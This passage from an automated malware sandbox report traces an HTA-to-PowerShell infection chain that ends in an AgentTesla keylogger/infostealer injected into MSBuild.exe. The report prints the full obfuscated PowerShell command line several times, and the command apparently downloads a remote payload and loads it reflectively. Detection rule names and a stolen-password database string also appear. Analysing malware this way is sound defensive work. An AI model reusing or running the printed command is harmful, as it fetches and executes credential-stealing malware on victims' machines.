Q#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#ZwBy#Hk#b#Bs#HU#cw#p#Ds#J#Bp#G4#YwBs#GU#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bz#G4#aQB0#HQ#eQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#TQBT#EI#dQBp#Gw#Z##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::From
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bl#Hg#a#Bh#HU#cwB0#GU#Z##g#D0#I##n#HQ#e#B0#C4#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##2#GU#cwBh#GI#Lw#3#DE#Lg#w#DI#Mg#u#DM#Lg#y#Dk#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HM#bgBp#HQ#d#B5#C##PQ#g#CQ#ZQB4#Gg#YQB1#HM#d#Bl#GQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#a#Bv#HY#ZQBs#GE#cgBk#C##PQ#g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#DE#M##w#Dc#LgBm#Gk#b#Bl#G0#YQBp#Gw#LgBj#G8#bQ#v#GE#c#Bp#C8#ZgBp#Gw#ZQ#v#Gc#ZQB0#D8#ZgBp#Gw#ZQBr#GU#eQ#9#EU#UwBZ#FQ#aQBU#FI#MwBP#D##MwBF#DU#cQBy#E0#bgBJ#Hk#eQBX#HQ#WQBm#DU#TwBN#EY#VQ#w#G0#YQBr#Hg#TQB1#D##ZQBQ#HE#UgBS#Eo#TgBp#GM#TgBq#EM#Mw#2#GE#O#BU#DI#agBH#GY#VwBU#DY#RgBF#EI#ag#1#HM#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#M##2#DY#Nw#w#DU#M##4#D##YQ#1#GU#Zg#n#Ds#J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bz#HQ#aQBs#GI#ZQBu#GU#I##9#C##J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#Gg#bwB2#GU#b#Bh#HI#Z##p#Ds#J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bz#HQ#aQBs#GI#ZQBu#GU#KQ#7#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#bwBy#Gk#ZwBp#G4#YQBy#Hk#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#C##PQ#g#CQ#ZwBl#HI#dQBu#GQ#aQBh#Gw#b#B5#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#p#Ds#J#Bt#GU#d#Bv#G4#eQBt#HM#I##9#C##J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bv#HI#aQBn#Gk#bgBh#HI#eQ#p#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bt#GU#d#Bv#G4#eQBt#HM#I##t#Gc#d##g#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##r#D0#I##k#GU#d#Bo#G0#bwB2#G8#bQBl#HI#aQBu#GU#LgBM#GU#bgBn#HQ#a##7#CQ#cwBw#GE#YwBp#GU#cg#g#D0#I##k#G0#ZQB0#G8#bgB5#G0#cw#g#C0#I##k#G4#bwBu#GM#b#Bv#HQ#a#Bp#G4#Zw#7#CQ#cwB1#GI#agBl#GM#d##g#D0#I##k#Gc#ZQBy#HU#bgBk#Gk#YQBs#Gw#eQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#L##g#CQ#cwBw#GE#YwBp#GU#cg#p#Ds#J#Bn#HI#eQBs#Gw#dQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#HM#dQBi#Go#ZQBj#HQ#KQ#7#CQ#YgBh#GM#awBj#Gg#YQBu#G4#ZQBs#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#ZwBy#Hk#b#Bs#HU#cw#p#Ds#J#Bp#G4#YwBs#GU#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bz#G4#aQB0#HQ#eQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#TQBT#EI#dQBp#Gw#Z##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00C3DAF05_2_00C3DAF0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0101B6B28_2_0101B6B2
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_01014AC88_2_01014AC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_01013EB08_2_01013EB0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_010141F88_2_010141F8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0101AB388_2_0101AB38
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_0101ABF38_2_0101ABF3
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_062A42008_2_062A4200
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_062A30508_2_062A3050
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_062A59A88_2_062A59A8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_062A00408_2_062A0040
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 8_2_062A52C08_2_062A52C0
                        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 3009
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 3009Jump to behavior
                        Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 8.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                        Source: 5.2.powershell.exe.5e0e358.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 5.2.powershell.exe.5e0e358.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
                        Source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, 9O2OLI.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, hdYUG.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, LGBZ4N2f.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, F8OmG.csCryptographic APIs: 'CreateDecryptor'
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, Bgo.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, k7FmsUgnvL.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, dVjkZ3EEsen.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, dVjkZ3EEsen.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, dVjkZ3EEsen.csCryptographic APIs: 'TransformFinalBlock'
                        Source: 5.2.powershell.exe.5e0e358.7.raw.unpack, dVjkZ3EEsen.csCryptographic APIs: 'TransformFinalBlock'
                        Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winHTA@15/7@4/4
                        Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\0[1].txtJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03
                        Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Windows\Temp\misdivide.batJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.bat
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript //nologo "C:\Windows\Temp\octupole.vbs"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: MSBuild.exe, 00000008.00000002.2936900255.0000000002AE9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\morninghtaaaafilex.hta"
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.bat
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript //nologo "C:\Windows\Temp\octupole.vbs"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 /nobreak
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bl#Hg#a#Bh#HU#cwB0#GU#Z##g#D0#I##n#HQ#e#B0#C4#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##2#GU#cwBh#GI#Lw#3#DE#Lg#w#DI#Mg#u#DM#Lg#y#Dk#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HM#bgBp#HQ#d#B5#C##PQ#g#CQ#ZQB4#Gg#YQB1#HM#d#Bl#GQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#a#Bv#HY#ZQBs#GE#cgBk#C##PQ#g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#DE#M##w#Dc#LgBm#Gk#b#Bl#G0#YQBp#Gw#LgBj#G8#bQ#v#GE#c#Bp#C8#ZgBp#Gw#ZQ#v#Gc#ZQB0#D8#ZgBp#Gw#ZQBr#GU#eQ#9#EU#UwBZ#FQ#aQBU#FI#MwBP#D##MwBF#DU#cQBy#E0#bgBJ#Hk#eQBX#HQ#WQBm#DU#TwBN#EY#VQ#w#G0#YQBr#Hg#TQB1#D##ZQBQ#HE#UgBS#Eo#TgBp#GM#TgBq#EM#Mw#2#GE#O#BU#DI#agBH#GY#VwBU#DY#RgBF#EI#ag#1#HM#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#M##2#DY#Nw#w#DU#M##4#D##YQ#1#GU#Zg#n#Ds#J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bz#HQ#aQBs#GI#ZQBu#GU#I##9#C##J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#Gg#bwB2#GU#b#Bh#HI#Z##p#Ds#J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bz#HQ#aQBs#GI#ZQBu#GU#KQ#7#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#bwBy#Gk#ZwBp#G4#YQBy#Hk#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#C##PQ#g#CQ#ZwBl#HI#dQBu#GQ#aQBh#Gw#b#B5#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#p#Ds#J#Bt#GU#d#Bv#G4#eQBt#HM#I##9#C##J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bv#HI#aQBn#Gk#bgBh#HI#eQ#p#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bt#GU#d#Bv#G4#eQBt#HM#I##t#Gc#d##g#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##r#D0#I##k#GU#d#Bo#G0#bwB2#G8#bQBl#HI#aQBu#GU#LgBM#GU#bgBn#HQ#a##7#CQ#cwBw#GE#YwBp#GU#cg#g#D0#I##k#G0#ZQB0#G8#bgB5#G0#cw#g#C0#I##k#G4#bwBu#GM#b#Bv#HQ#a#Bp#G4#Zw#7#CQ#cwB1#GI#agBl#GM#d##g#D0#I##k#Gc#ZQBy#HU#bgBk#Gk#YQBs#Gw#eQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#L##g#CQ#cwBw#GE#YwBp#GU#cg#p#Ds#J#Bn#HI#eQBs#Gw#dQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#HM#dQBi#Go#ZQBj#HQ#KQ#7#CQ#YgBh#GM#awBj#Gg#YQBu#G4#ZQBs#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#ZwBy#Hk#b#Bs#HU#cw#p#Ds#J#Bp#G4#YwBs#GU#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bz#G4#aQB0#HQ#eQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#TQBT#EI#dQBp#Gw#Z##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::From
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\misdivide.batJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript //nologo "C:\Windows\Temp\octupole.vbs"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 /nobreakJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#Bl#Hg#a#Bh#HU#cwB0#GU#Z##g#D0#I##n#HQ#e#B0#C4#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##0#DQ#N##2#GU#cwBh#GI#Lw#3#DE#Lg#w#DI#Mg#u#DM#Lg#y#Dk#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#HM#bgBp#HQ#d#B5#C##PQ#g#CQ#ZQB4#Gg#YQB1#HM#d#Bl#GQ#I##t#HI#ZQBw#Gw#YQBj#GU#I##n#CM#Jw#s#C##JwB0#Cc#Ow#k#HM#a#Bv#HY#ZQBs#GE#cgBk#C##PQ#g#Cc#a#B0#HQ#c#Bz#Do#Lw#v#DE#M##w#Dc#LgBm#Gk#b#Bl#G0#YQBp#Gw#LgBj#G8#bQ#v#GE#c#Bp#C8#ZgBp#Gw#ZQ#v#Gc#ZQB0#D8#ZgBp#Gw#ZQBr#GU#eQ#9#EU#UwBZ#FQ#aQBU#FI#MwBP#D##MwBF#DU#cQBy#E0#bgBJ#Hk#eQBX#HQ#WQBm#DU#TwBN#EY#VQ#w#G0#YQBr#Hg#TQB1#D##ZQBQ#HE#UgBS#Eo#TgBp#GM#TgBq#EM#Mw#2#GE#O#BU#DI#agBH#GY#VwBU#DY#RgBF#EI#ag#1#HM#JgBw#Gs#XwB2#Gk#Z##9#DM#N##y#Dg#M##z#GQ#MQBj#GM#N#Bl#DM#Yg#4#D##MQ#3#DQ#M##2#DY#Nw#w#DU#M##4#D##YQ#1#GU#Zg#n#Ds#J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#g#D0#I#BO#GU#dw#t#E8#YgBq#GU#YwB0#C##UwB5#HM#d#Bl#G0#LgBO#GU#d##u#Fc#ZQBi#EM#b#Bp#GU#bgB0#Ds#J#Bz#HQ#aQBs#GI#ZQBu#GU#I##9#C##J#Bv#HI#ZwBh#G4#bwBs#GE#bgB0#Gg#YQBu#HU#bQ#u#EQ#bwB3#G4#b#Bv#GE#Z#BE#GE#d#Bh#Cg#J#Bz#Gg#bwB2#GU#b#Bh#HI#Z##p#Ds#J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FQ#ZQB4#HQ#LgBF#G4#YwBv#GQ#aQBu#Gc#XQ#6#Do#VQBU#EY#O##u#Ec#ZQB0#FM#d#By#Gk#bgBn#Cg#J#Bz#HQ#aQBs#GI#ZQBu#GU#KQ#7#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#bwBy#Gk#ZwBp#G4#YQBy#Hk#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#C##PQ#g#CQ#ZwBl#HI#dQBu#GQ#aQBh#Gw#b#B5#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#ZQB0#Gg#bQBv#HY#bwBt#GU#cgBp#G4#ZQ#p#Ds#J#Bt#GU#d#Bv#G4#eQBt#HM#I##9#C##J#Bn#GU#cgB1#G4#Z#Bp#GE#b#Bs#Hk#LgBJ#G4#Z#Bl#Hg#TwBm#Cg#J#Bv#HI#aQBn#Gk#bgBh#HI#eQ#p#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##t#Gc#ZQ#g#D##I##t#GE#bgBk#C##J#Bt#GU#d#Bv#G4#eQBt#HM#I##t#Gc#d##g#CQ#bgBv#G4#YwBs#G8#d#Bo#Gk#bgBn#Ds#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#I##r#D0#I##k#GU#d#Bo#G0#bwB2#G8#bQBl#HI#aQBu#GU#LgBM#GU#bgBn#HQ#a##7#CQ#cwBw#GE#YwBp#GU#cg#g#D0#I##k#G0#ZQB0#G8#bgB5#G0#cw#g#C0#I##k#G4#bwBu#GM#b#Bv#HQ#a#Bp#G4#Zw#7#CQ#cwB1#GI#agBl#GM#d##g#D0#I##k#Gc#ZQBy#HU#bgBk#Gk#YQBs#Gw#eQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bu#G8#bgBj#Gw#bwB0#Gg#aQBu#Gc#L##g#CQ#cwBw#GE#YwBp#GU#cg#p#Ds#J#Bn#HI#eQBs#Gw#dQBz#C##PQ#g#Fs#UwB5#HM#d#Bl#G0#LgBD#G8#bgB2#GU#cgB0#F0#Og#6#EY#cgBv#G0#QgBh#HM#ZQ#2#DQ#UwB0#HI#aQBu#Gc#K##k#HM#dQBi#Go#ZQBj#HQ#KQ#7#CQ#YgBh#GM#awBj#Gg#YQBu#G4#ZQBs#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#ZwBy#Hk#b#Bs#HU#cw#p#Ds#J#Bp#G4#YwBs#GU#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bz#G4#aQB0#HQ#eQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#TQBT#EI#dQBp#Gw#Z##n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Cw#Jw#n#Ck#KQ#='; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
